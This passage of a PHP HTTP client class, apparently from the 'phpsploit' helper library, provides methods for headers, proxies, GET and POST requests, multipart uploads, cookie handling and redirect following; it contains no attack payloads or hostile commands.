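            if (preg_match("/^$name:/m", $this->header))
            {
                // Replace through the end of the line so values with spaces are fully replaced.
                $fresh = addcslashes($headern.": ".$headervalue, '\\$');
                $this->header = preg_replace("/^$name: [^\r\n]*/m", $fresh, $this->header);
            }
            else
            {
                $this->header .= "\r\n".$headern.": ".$headervalue;
            }
            return;
        }

        // Line form with nothing stored yet.
        if (empty($this->header))
        {
            $this->header = $headern;
            return;
        }

        // Line form merged into existing headers; a line without ": " is ignored.
        $headarr = explode(": ", (string) $headern, 2);
        if (count($headarr) < 2 || $headarr[1] === '') return;
        $this->addheader($headarr[0], $headarr[1]);
    }


    /**
     * Routes requests through an HTTP proxy.
     *
     * $this->proxy("proxyip","8118");
     * $this->proxy("proxyip:8118")
     *
     * A "host:port" string that does not parse leaves the proxy unset.
     *
     * @param string  $proxy  Proxy host, or "host:port".
     * @param integer $proxyp Proxy port when the host is given separately.
     */
    public function proxy($proxy,$proxyp='')
    {
        if (empty($proxyp))
        {
            if (preg_match("/^(\S*):(\d+)$/", $proxy, $proxarr))
            {
                $this->proxyhost = $proxarr[1];
                $this->proxyport = intval($proxarr[2]);
            }
            else
            {
                $this->proxyhost = '';
                $this->proxyport = 0;
            }
        }
        else
        {
            $this->proxyhost = $proxy;
            $this->proxyport = intval($proxyp);
        }
        if ($this->proxyport > 65535) die("Error: Invalid port number");
    }


    /**
     * Sets credentials for a proxy that requires basic authentication.
     *
     * $this->proxyauth("darkfig","dapasswd");
     * $this->proxyauth("darkfig:dapasswd");
     *
     * The combined form is split at the first colon, so the password may
     * itself contain colons.
     *
     * @param string $proxyauth  User name, or "user:password".
     * @param string $proxypasse Password when the user is given separately.
     */
    public function proxyauth($proxyauth,$proxypasse='')
    {
        if (empty($proxypasse))
        {
            $parts = explode(":", (string) $proxyauth, 2);
            $this->proxyuser = $parts[0];
            $this->proxypass = isset($parts[1]) ? $parts[1] : '';
        }
        else
        {
            $this->proxyuser = $proxyauth;
            $this->proxypass = $proxypasse;
        }
    }


    /**
     * Sets the User-Agent header value.
     *
     * @param string $useragent
     */
    public function agent($useragent)
    {
        $this->agent = $useragent;
    }


    /**
     * Returns the extra header lines that will be sent with the next request.
     *
     * @return string
     */
    public function showheader()
    {
        return $this->header;
    }


    /**
     * Returns the Cookie header value that will be sent with the next request.
     *
     * @return string
     */
    public function showcookie()
    {
        return $this->cookie;
    }


    /**
     * Returns the last request as it was written to the socket.
     *
     * @return string
     */
    public function showlastrequest()
    {
        return $this->packet;
    }


    /**
     * Sends a GET request.
     *
     * $this->get("http://localhost");
     * $this->get("http://localhost:888/xd/tst.php");
     *
     * @param string $url Absolute http:// URL, optionally with a port.
     * @return string Server response.
     */
    public function get($url)
    {
        $this->target($url);
        $this->method = "get";
        return $this->sock();
    }


    /**
     * Sends a POST request with an application/x-www-form-urlencoded body.
     *
     * $this->post("http://localhost/index.php","admin=1&user=dark");
     *
     * @param string $url  Absolute http:// URL.
     * @param string $data Already-encoded request body.
     * @return string Server response.
     */
    public function post($url,$data)
    {
        $this->target($url);
        $this->method = "post";
        $this->data = $data;
        return $this->sock();
    }


    /**
     * Sends a POST request with a multipart/form-data body.
     *
     * Reserved keys: 'frmdt_url' (target URL) and 'frmdt_boundary' (optional).
     * Every other key is a field; an array value describes a file part with
     * 'frmdt_filename', 'frmdt_content' and the optional 'frmdt_type' and
     * 'frmdt_transfert' entries.
     *
     * @param array $array Field description as outlined above.
     * @return string Server response.
     */
    public function formdata($array)
    {
        $eol = "\r\n";
        $delimiter = "-----------------------------";

        $this->target($array['frmdt_url']);
        $this->method = "formdata";
        $this->data = '';
        $this->boundary = isset($array['frmdt_boundary']) ? $array['frmdt_boundary'] : "phpsploit";

        foreach ($array as $key => $value)
        {
            if (preg_match("#^frmdt_(boundary|url)#", (string) $key)) continue;

            $this->data .= $delimiter.$this->boundary.$eol;
            $this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
            if (!is_array($value))
            {
                $this->data .= $eol.$eol.$value.$eol;
                continue;
            }

            $this->data .= " filename=\"".$value['frmdt_filename']."\";".$eol;
            if (isset($value['frmdt_type'])) $this->data .= "Content-Type: ".$value['frmdt_type'].$eol;
            if (isset($value['frmdt_transfert'])) $this->data .= "Content-Transfer-Encoding: ".$value['frmdt_transfert'].$eol;
            $this->data .= $eol.$value['frmdt_content'].$eol;
        }
        $this->data .= $delimiter.$this->boundary."--".$eol;
        return $this->sock();
    }


    /**
     * Returns the body of a response, i.e. everything from the first line
     * after the status line that is not shaped like "name:".
     *
     * @param string $code Raw response; defaults to the last one received.
     * @return string Body lines, each terminated by CRLF.
     */
    public function getcontent($code='')
    {
        if (empty($code)) $code = $this->recv;
        $content = explode("\r\n", $code);
        $onlycode = '';
        $inbody = false;
        for ($i = 1; $i < count($content); $i++)
        {
            if (!preg_match("/^(\S*):/", $content[$i])) $inbody = true;
            if ($inbody) $onlycode .= $content[$i]."\r\n";
        }
        return $onlycode;
    }


    /**
     * Returns the status line and header lines of a response.
     *
     * @param string $code Raw response; defaults to the last one received.
     * @return string Header block, each line terminated by CRLF.
     */
    public function getheader($code='')
    {
        if (empty($code)) $code = $this->recv;
        $header = explode("\r\n", $code);
        $onlyheader = $header[0]."\r\n";
        for ($i = 1; $i < count($header); $i++)
        {
            if (!preg_match("/^(\S*):/", $header[$i])) break;
            $onlyheader .= $header[$i]."\r\n";
        }
        return $onlyheader;
    }


    /**
     * Copies every Set-Cookie name/value pair found in a header block into
     * the Cookie header for the next requests. Called by cookiejar().
     *
     * @param string $code Response header block.
     */
    private function getcookie($code)
    {
        $lines = explode("\n", str_replace("\r\n", "\n", (string) $code));
        foreach ($lines as $line)
        {
            if (!preg_match("/set-cookie: (.*)/i", $line, $cookarr)) continue;

            // Drop the path and expires attributes before reading the pair.
            $pair = preg_replace("/path=(.*)/i", "", $cookarr[1]);
            $pair = preg_replace("/expires=(.*)(GMT|UTC)(\S*)$/i", "", $pair);

            // The value stops at ";" so the separator is not stored as part of it.
            if (!preg_match("/([^=;\s]+)=([^;\s]*)/", $pair, $matches)) continue;
            $this->addcookie($matches[1], $matches[2]);
        }
    }


    /**
     * Splits a URL into the host, port and directory path used by sock().
     * Called by get(), post() and formdata().
     *
     * @param string $urltarg Absolute http:// URL.
     */
    private function target($urltarg)
    {
        // A URL without any "/" after the host gets one appended.
        if (!preg_match("#^http://(.*)/#", $urltarg)) $urltarg .= "/";
        $this->url = $urltarg;

        $rest = preg_replace("#^http://#", "", $urltarg);
        $slash = strpos($rest, "/");
        $authority = explode(":", substr($rest, 0, $slash), 2);

        $this->host = $authority[0];
        $port = isset($authority[1]) ? intval($authority[1]) : 0;
        $this->port = ($port > 0) ? $port : 80;

        // Directory part of the path, without the query string.
        $path = substr($rest, $slash);
        $query = strpos($path, "?");
        if ($query !== false) $path = substr($path, 0, $query);
        $this->path = substr($path, 0, strrpos($path, "/") + 1);

        if ($this->port > 65535) die("Error: Invalid port number");
    }


    /**
     * Switches the cookie jar on or off, or (when given a header block)
     * stores the cookies it sets.
     *
     * $this->cookiejar(1); // enabled
     * $this->cookiejar(0); // disabled
     *
     * @param int|string $code 1, 0, or a response header block.
     */
    public function cookiejar($code)
    {
        if ($code === 0) $this->cookiejar = '';
        elseif ($code === 1) $this->cookiejar = 1;
        else $this->getcookie($code);
    }


    /**
     * Switches redirect following on or off, or (when given a response)
     * follows the redirect it announces.
     *
     * $this->allowredirection(1); // enabled
     * $this->allowredirection(0); // disabled
     *
     * Only the header block is searched for a target, and at most
     * MAX_REDIRECTS redirects are followed per request.
     *
     * @param int|string $code 1, 0, or a raw response.
     * @return string|null The followed response, or the given one when no
     *                     redirect applies; null for the 0/1 toggles.
     */
    public function allowredirection($code)
    {
        if ($code === 0) { $this->allowredirection = ''; return null; }
        if ($code === 1) { $this->allowredirection = 1; return null; }

        $headers = $this->getheader($code);
        $found = preg_match("/^(location|content-location|uri): (.*)$/mi", $headers, $codearr);
        if (!$found || $this->redirects >= self::MAX_REDIRECTS)
        {
            $this->redirects = 0;
            return $code;
        }

        $this->redirects++;
        $location = str_replace(chr(13), '', $codearr[2]);
        if (strpos($location, "://") === false)
        {
            // Relative target: resolve against the current host and directory.
            $location = "http://".$this->host.$this->path.$location;
        }
        $response = $this->get($location);
        $this->redirects = 0;
        return $response;
    }


    /**
     * Clears stored request settings.
     *
     * $this->reset("header"); // headers cleared
     * $this->reset("cookie"); // cookies cleared
     * $this->reset();         // headers, cookies, agent and both switches cleared
     *
     * @param string $func "header", "cookie", or empty for everything.
     */
    public function reset($func='')
    {
        switch ($func)
        {
            case "header":
                $this->header = '';
                break;

            case "cookie":
                $this->cookie = '';
                break;

            default:
                $this->cookiejar = '';
                $this->header = '';
                $this->cookie = '';
                $this->allowredirection = '';
                $this->agent = '';
                break;
        }
    }
}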
?>&nbsp;
                              
